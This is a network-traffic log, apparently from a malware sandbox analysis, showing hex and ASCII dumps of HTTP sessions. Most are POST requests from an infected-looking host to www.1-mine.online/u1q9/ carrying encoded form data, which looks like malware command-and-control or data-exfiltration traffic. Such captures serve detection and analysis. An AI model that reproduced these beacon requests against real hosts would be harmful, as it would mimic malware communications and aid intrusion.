                                                                                                                                                                                                                        Data Raw: 31 35 34 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 72 75 73 73 65 2d 74 72 79 6b 6b 2e 6f 6e 6c 69 6e 65 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 154a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.russe-trykk.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166614056 CEST1289INData Raw: 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78
                                                                                                                                                                                                                        Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { positi
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166738987 CEST1289INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a 20 20 20 20 20 20 20 20 6e 6f 3a 20
                                                                                                                                                                                                                        Data Ascii: ref="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.russe-trykk.online') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vre aktivt brukt
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166883945 CEST1289INData Raw: 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 74 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 72 75 73 73 65 2d 74 72 79 6b 6b 2e 6f 6e 6c 69 6e 65 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: <div class="container"> <h1 id="t"> www.russe-trykk.online is parked </h1> <p id="m"> www.russe-trykk.online is registered, but the owner currently does not have an active website
                                                                                                                                                                                                                        Oct 23, 2024 18:58:37.166932106 CEST565INData Raw: 20 20 20 3e 44 6f 6d 65 6e 65 73 68 6f 70 20 41 53 20 26 63 6f 70 79 3b 0a 20 20 20 20 20 20 20 20 32 30 32 34 3c 2f 73 70 61 6e 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 26 6d 69 64 64 6f 74 3b 0a 20 20 20 20 20 20 3c 73 70 61 6e 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 71741cd14833bbbeea44538997e1c15c/parkedweb01 </span> </div> <script> q("ls").setAttribute("style", ""); fun


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        82192.168.11.2049874172.67.148.13380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.281696081 CEST808OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 75 58 2b 4d 68 62 6a 44 59 4a 77 55 59 4c 50 61 62 58 5a 55 43 69 70 4a 41 68 63 38 2f 47 57 48 38 63 64 6a 6c 59 46 38 72 33 49 44 76 49 6c 4a 6b 75 67 45 78 55 36 35 2f 48 4e 63 44 34 76 66 65 49 6a 38 4f 75 2f 46 43 67 2b 65 52 37 2f 6e 56 64 31 4c 38 70 76 79 55 48 37 4d 72 49 79 75 34 41 54 4e 56 75 37 4f 73 41 37 34 4d 66 39 34 37 6f 30 79 34 44 75 41 72 77 63 70 4e 6e 6f 45 67 62 7a 79 73 41 31 51 78 50 4f 74 47 64 78 71 65 63 67 6e 72 37 4d 77 69 35 5a 74 46 57 6a 77 2f 4b 63 37 50 39 61 2b 78 33 79 2b 37 4e 62 79 4d 4f 70 30 46 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8uX+MhbjDYJwUYLPabXZUCipJAhc8/GWH8cdjlYF8r3IDvIlJkugExU65/HNcD4vfeIj8Ou/FCg+eR7/nVd1L8pvyUH7MrIyu4ATNVu7OsA74Mf947o0y4DuArwcpNnoEgbzysA1QxPOtGdxqecgnr7Mwi5ZtFWjw/Kc7P9a+x3y+7NbyMOp0Fg==
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608000994 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KN79VzwUtdqvSKpySWdS%2F%2B8FSANgptTCmh%2FfnAPyMVKDh%2FdtAcR6gRjYaFjR2d4ow2xPR2J%2Fxz%2B%2Ba%2BPhLVKpjQLuujC9Ro85%2BRacx7RnP6jg30SSIP0%2F9s2iaPtjlnzTuicrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7345fe9f790cb1-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94213&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 52
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608059883 CEST1289INData Raw: 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                        Data Ascii: 0: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, no
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608110905 CEST1289INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73
                                                                                                                                                                                                                        Data Ascii: <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-non
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608160973 CEST1289INData Raw: 31 32 20 68 2d 31 32 20 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e
                                                                                                                                                                                                                        Data Ascii: 12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608203888 CEST1289INData Raw: 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20
                                                                                                                                                                                                                        Data Ascii: div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="te
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608246088 CEST1289INData Raw: 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d
                                                                                                                                                                                                                        Data Ascii: ener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper
                                                                                                                                                                                                                        Oct 23, 2024 18:58:42.608278990 CEST397INData Raw: 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c
                                                                                                                                                                                                                        Data Ascii: oter-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=doc


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        83192.168.11.2049875172.67.148.13380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:44.906498909 CEST828OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 73 33 4f 4d 74 62 66 44 4a 70 77 56 63 37 50 61 56 33 5a 51 43 69 74 4a 41 67 49 53 38 30 79 48 38 35 68 6a 69 5a 46 38 6d 58 49 44 6b 6f 6b 44 72 4f 67 62 78 55 33 45 2f 43 31 63 44 34 54 66 65 4d 6e 38 4f 2f 2f 45 45 67 2b 63 5a 62 2f 6c 59 39 31 4c 38 70 76 79 55 48 2b 5a 72 49 71 75 2f 77 44 4e 61 76 37 4e 76 41 37 37 4a 66 39 34 6f 34 31 35 34 44 76 54 72 31 46 2b 4e 6a 59 45 67 5a 37 79 73 54 74 54 2b 50 50 6d 49 39 77 57 62 63 42 4c 79 49 30 2b 76 6f 4a 4e 42 6d 62 51 33 38 52 68 53 50 75 61 79 6b 75 4d 2f 39 69 61 4f 4d 6f 76 59 6c 4f 53 34 48 61 76 31 55 53 50 6b 31 51 32 31 4b 7a 41 77 64 59 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS80yH85hjiZF8mXIDkokDrOgbxU3E/C1cD4TfeMn8O//EEg+cZb/lY91L8pvyUH+ZrIqu/wDNav7NvA77Jf94o4154DvTr1F+NjYEgZ7ysTtT+PPmI9wWbcBLyI0+voJNBmbQ38RhSPuaykuM/9iaOMovYlOS4Hav1USPk1Q21KzAwdY=
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272495985 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:58:45 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yfOaJoGBuwEnpqn26%2BmQcjYSg3GdiYqohhoycACntZWCZcoq9S6TelMeU%2BICedlACaiVT06g3sry3cUk%2FlR5il%2BYdUJgCUHqeyoi1%2Bbk4IindFB73prWWa95I0b5AYZlgGF%2FnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73460efa54c34a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94642&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web s
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272557974 CEST1289INData Raw: 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71
                                                                                                                                                                                                                        Data Ascii: erver is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow"
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272607088 CEST1289INData Raw: 73 73 3d 22 63 6c 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61
                                                                                                                                                                                                                        Data Ascii: ss="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-c
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272654057 CEST1289INData Raw: 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f
                                                                                                                                                                                                                        Data Ascii: absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272697926 CEST1289INData Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl f
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272739887 CEST1289INData Raw: 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d 45 72 72 6f 72 2d 35 32
                                                                                                                                                                                                                        Data Ascii: eferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 l
                                                                                                                                                                                                                        Oct 23, 2024 18:58:45.272773027 CEST389INData Raw: 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e
                                                                                                                                                                                                                        Data Ascii: m-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;do


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                        84192.168.11.2049876172.67.148.13380
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:58:47.531887054 CEST5156OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 73 33 4f 4d 74 62 66 44 4a 70 77 56 63 37 50 61 56 33 5a 51 43 69 74 4a 41 67 49 53 38 30 36 48 2f 4c 35 6a 6b 36 74 38 6e 58 49 44 36 59 6b 41 72 4f 67 53 78 56 66 49 2f 43 77 70 44 39 58 66 63 70 7a 38 66 36 66 45 58 41 2b 63 56 37 2f 6d 56 64 31 65 38 74 4c 32 55 48 75 5a 72 49 71 75 2f 32 48 4e 54 65 37 4e 70 41 37 34 4d 66 39 4f 37 6f 31 52 34 44 6d 6d 72 30 78 75 4e 53 6b 45 68 35 72 79 71 68 31 54 68 2f 50 6b 4c 39 77 4f 62 63 4e 55 79 49 35 48 76 6f 39 33 42 6c 72 51 7a 70 6b 4f 41 72 32 73 6f 53 75 52 67 73 6d 4f 41 4f 78 78 47 57 53 31 30 68 43 67 37 43 65 61 37 58 67 58 70 4a 54 61 78 61 73 69 39 50 33 4b 34 30 77 73 6e 33 55 6e 64 77 32 4e 56 66 63 38 73 66 6b 4b 67 66 49 6c 50 68 74 49 79 49 37 51 7a 79 76 4b 56 47 61 39 6f 4b 41 36 74 41 52 2f 4e 74 70 54 5a 68 45 31 2b 44 41 59 38 39 53 53 4f 6d 39 4e 30 4a 78 59 35 70 2f 55 2b 46 34 4e 41 50 73 63 6a 6b 4f 53 49 54 54 57 4b 66 64 45 38 78 43 69 62 52 6a 43 2f 5a 31 47 64 58 65 4a [TRUNCATED]
